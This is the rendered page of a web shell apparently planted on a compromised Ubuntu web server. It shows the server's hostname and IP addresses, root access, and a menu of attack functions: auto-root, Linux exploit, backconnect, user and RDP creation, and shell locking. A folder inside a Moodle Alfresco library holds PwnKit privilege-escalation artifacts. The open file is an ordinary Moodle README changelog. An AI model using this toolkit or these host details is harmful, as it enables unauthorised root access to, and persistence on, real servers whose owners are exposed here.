Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
insepet /
libromaster /
lib /
alfresco /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
Service
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-r--r--
README_MOODLE.txt
1.8
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README_MOODLE.txt
== CHANGELOG == 1. Rename class name 'Repository' to 'Alfresco_Repository' in - Service/Repository.php - Service/Webservice/AlfrescoWebService.php 2. Update path for require_once() in - Service/Logger/Logger.php - Service/WebService/WebServiceFactory.php - Service/ContentData.php - Service/Functions.php - Service/Node.php - Service/Repository.php - Service/Session.php - Service/SpacesStore.php - Service/Store.php 3. In Alfresco_Repository::__construct(), set _port to 80 when not specified @@ -46,7 +46,11 @@ class Alfresco_Repository extends BaseObject $this->_connectionUrl = $connectionUrl; $parts = parse_url($connectionUrl); $this->_host = $parts["host"]; - $this->_port = $parts["port"]; + if (empty($parts["port"])) { + $this->_port = 80; + } else { + $this->_port = $parts["port"]; + } 4. Reapply changes from MDL-20876 Fix depreacted split() calls (bed733c) 5. Fix strict standards in Service/WebService/AlfrescoWebService.php - AlfrescoWebService::__soapCall() arguments do not match SoapClient::__soapCall() - AlfrescoWebService::__doRequest() arguments do not match SoapClient::__soapCall() == Alfresco PHP Library == Installation and developer documentation for the Alfresco PHP Library can be found on the Alfresco Wiki. Get the source from http://code.google.com/p/alfresco-php-sdk/ == Documentation Links == Installation Instructions - http://code.google.com/p/alfresco-php-sdk/wiki/AlfrescoPHPLibraryInstallationInstructions MediaWiki Integration Installation Instructions - http://code.google.com/p/alfresco-php-sdk/wiki/AlfrescoMediaWikiInstallationInstructions PHP API Documentation - http://code.google.com/p/alfresco-php-sdk/wiki/AlfrescoPHPAPI
Close